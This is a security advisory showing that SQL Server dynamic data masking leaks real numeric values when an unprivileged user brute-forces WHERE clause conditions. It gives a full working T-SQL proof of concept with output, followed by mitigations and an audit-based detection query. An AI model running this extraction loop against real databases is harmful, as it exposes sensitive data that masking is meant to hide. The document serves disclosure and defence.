Microsoft SQL Server Masked Data Exposure

Posted Sep 17, 2024
Authored by Emad Al-Mousa

Microsoft SQL Server versions 2014, 2016, 2017, 2019, and 2022 suffer from an issue where masked data can be exposed through a brute force attack.

tags | exploit, cracker
SHA-256 | b0624723532f370b9f34af37f303e61f5b293ddd86ebcbb2599460d727a10878

Title: SQL Server Masked Data Exposure Through Brute Force Attack
Product: Database
Manufacturer: Microsoft
Affected Version(s): SQL Server 2014, 2016, 2017, 2019, 2022
Tested Version(s): SQL Server 2014, 2016, 2017, 2019, 2022
Risk Level: Low
Security Feature: Dynamic Data Masking
Author of Advisory: Emad Al-Mousa


*****************************************
Vulnerability Details and Background:

Microsoft SQL Server has a security feature called "dynamic data masking". It is designed to redact (mask) column-level values in query results, for columns that contain sensitive data such as credit card numbers.

The feature is useful but has several security weaknesses that organizations should be aware of. Among them is a brute force technique against the "where" conditional clause to retrieve actual (numeric) data values: the mask is applied to the values returned in the result set, while predicates in the WHERE clause are still evaluated against the real stored values, so a user who only ever sees masked output can test candidate values one at a time and observe which rows match.



*****************************************
Proof of Concept (PoC):

I will create a database called demodb, create a table called dbo.COMPANY and insert dummy data into it:

CREATE DATABASE demodb;
GO

USE [demodb]
GO

SET ANSI_NULLS ON
GO
SET QUOTED_IDENTIFIER ON
GO

-- Demo table: a text column and an integer column that will later be masked
CREATE TABLE [dbo].[COMPANY](
    [COMPANY_NAME] [nvarchar](max) NULL,
    [SALES]        [int]           NULL
) ON [PRIMARY] TEXTIMAGE_ON [PRIMARY]
GO

-- Dummy rows; SALES is an int, so the values are inserted as integers
INSERT INTO [dbo].[COMPANY] ([COMPANY_NAME], [SALES]) VALUES ('COMPANY_C', 93);
INSERT INTO [dbo].[COMPANY] ([COMPANY_NAME], [SALES]) VALUES ('COMPANY_A', 11);
INSERT INTO [dbo].[COMPANY] ([COMPANY_NAME], [SALES]) VALUES ('COMPANY_B', 78);
GO

------ I will enable the dynamic data masking function on the SALES column:

-- default() masks an int column as 0 for every principal without UNMASK permission
ALTER TABLE dbo.COMPANY
ALTER COLUMN SALES INT MASKED WITH (FUNCTION = 'default()');

------ Then I will create a user called reg_user that can only query the table, so the user sees the SALES column with completely masked data [ZERO values]:

USE [demodb]
GO

CREATE USER reg_user WITHOUT LOGIN;
GRANT SELECT ON dbo.COMPANY TO reg_user;

-- Impersonate the unprivileged user: SALES comes back as 0 for every row
EXECUTE AS USER = 'reg_user';
SELECT * FROM dbo.COMPANY;
REVERT;



------ However, using the same non-privileged database account reg_user, I am able to extract the actual values:

EXECUTE AS USER = 'reg_user';
DECLARE @sales_txt nvarchar(max);
DECLARE @LCounter INT = 1;
WHILE (@LCounter < 99)
BEGIN
    -- The WHERE predicate is evaluated against the real SALES value, not the masked one,
    -- so a row is returned only when the guessed counter equals the stored value
    SET @sales_txt = (SELECT COMPANY_NAME + ' sales is ' + CAST(@LCounter AS nvarchar)
                      FROM dbo.COMPANY
                      WHERE SALES = @LCounter);
    PRINT @sales_txt;
    SET @LCounter = @LCounter + 1;
END
REVERT;


Output:

COMPANY_A sales is 11
COMPANY_B sales is 78
COMPANY_C sales is 93

------ Actual values were successfully extracted from the masked column!


*****************************************

Protection Mechanisms:

1. Ensure network firewall rules are in place so that database accounts can connect to the destination database server host only from a specific list of source hosts. This adds a useful protection layer, especially if database account credentials are exposed.

2. Implement security auditing against identified sensitive tables.

3. Implement other security features alongside dynamic data masking, such as encryption. Of course, the Always Encrypted feature is the best in terms of data protection.
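Protection point 2 in worked form, as an added example that is not part of the original advisory: it inventories which columns are masked and who can read the demo table, creates a SQL Server Audit on SELECT against dbo.COMPANY, and then queries the audit file for a principal issuing an unusually high number of SELECT executions against the masked table inside one minute, which is the footprint the probing loop above leaves. The audit and specification names, the file path and the 50-per-minute threshold are assumptions.

```sql
USE [demodb];
GO

-- 1. Inventory: which columns are masked, and which principals can read the table.
--    sys.masked_columns lists every column carrying a masking function.
SELECT OBJECT_SCHEMA_NAME(mc.object_id) AS schema_name,
       OBJECT_NAME(mc.object_id)        AS table_name,
       mc.name                          AS column_name,
       mc.masking_function
FROM sys.masked_columns AS mc
WHERE mc.is_masked = 1;

SELECT dp.name AS principal_name, pe.permission_name, pe.state_desc
FROM sys.database_permissions AS pe
JOIN sys.database_principals AS dp ON dp.principal_id = pe.grantee_principal_id
WHERE pe.major_id = OBJECT_ID('dbo.COMPANY')
  AND pe.permission_name IN ('SELECT', 'UNMASK');
GO

-- 2. Audit every SELECT against the masked table (audit names and path are assumed).
USE [master];
GO
CREATE SERVER AUDIT [Audit_MaskedTables]
    TO FILE (FILEPATH = 'C:\SQLAudit\')            -- assumed path; directory must exist
    WITH (QUEUE_DELAY = 1000, ON_FAILURE = CONTINUE);
ALTER SERVER AUDIT [Audit_MaskedTables] WITH (STATE = ON);
GO
USE [demodb];
GO
CREATE DATABASE AUDIT SPECIFICATION [AuditSpec_COMPANY_Select]
    FOR SERVER AUDIT [Audit_MaskedTables]
    ADD (SELECT ON OBJECT::dbo.COMPANY BY public)
    WITH (STATE = ON);
GO

-- 3. Detection: one principal executing many SELECTs against the masked table within
--    a single minute. Each loop iteration above is logged as its own SELECT event.
--    The threshold (50 per minute) is an assumed starting point; tune it per workload.
SELECT server_principal_name,
       database_principal_name,
       DATEADD(MINUTE, DATEDIFF(MINUTE, 0, event_time), 0) AS minute_bucket,
       COUNT(*) AS select_executions
FROM sys.fn_get_audit_file('C:\SQLAudit\*.sqlaudit', DEFAULT, DEFAULT)
WHERE action_id = 'SL'                             -- 'SL' is the SELECT action
  AND object_name = 'COMPANY'
GROUP BY server_principal_name, database_principal_name,
         DATEADD(MINUTE, DATEDIFF(MINUTE, 0, event_time), 0)
HAVING COUNT(*) >= 50
ORDER BY select_executions DESC;
```

Run section 3 after replaying the PoC loop as reg_user: the impersonated user shows up in database_principal_name with roughly one execution per guessed value in the same minute bucket, while ordinary application access to the table stays well below the threshold.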


*****************************************
References:
https://learn.microsoft.com/en-us/sql/relational-databases/security/dynamic-data-masking?view=sql-server-ver16
https://databasesecurityninja.wordpress.com/2023/08/08/hacking-sql-server-dynamic-data-masking-feature-with-brute-force-technique/
https://www.youtube.com/watch?v=NiAg0sGsGtw




